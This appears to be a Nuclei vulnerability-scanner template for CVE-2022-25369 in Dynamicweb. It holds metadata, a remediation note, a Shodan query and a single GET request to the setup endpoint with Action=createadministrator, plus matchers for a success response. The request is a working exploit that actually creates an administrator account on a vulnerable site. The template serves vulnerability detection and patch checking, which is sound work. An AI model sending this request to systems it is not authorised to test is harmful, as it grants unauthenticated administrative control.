id: CVE-2022-25369 info: name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation author: pdteam severity: critical description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user. remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.' reference: - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-25369 cwe-id: CWE-425 metadata: max-request: 1 shodan-query: http.component:"Dynamicweb" tags: cve,cve2022,dynamicweb,rce,unauth http: - method: GET path: - "{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test" matchers-condition: and matchers: - type: word part: body words: - '"Success": true' - '"Success":true' condition: or - type: word part: header words: - 'application/json' - 'ASP.NET_SessionId' condition: and case-insensitive: true - type: status status: - 200 # digest: 4b0a00483046022100d861c6b54f392f878f8fa92381bd9c2a90fc33b725f0f0cd90dc2fc9cf73729d022100f33df12bee6dc733a2acdd26821bccb0c0a2885f1315ba35ed1fa942664bbadd:922c64590222798bb761d5b6d8e72950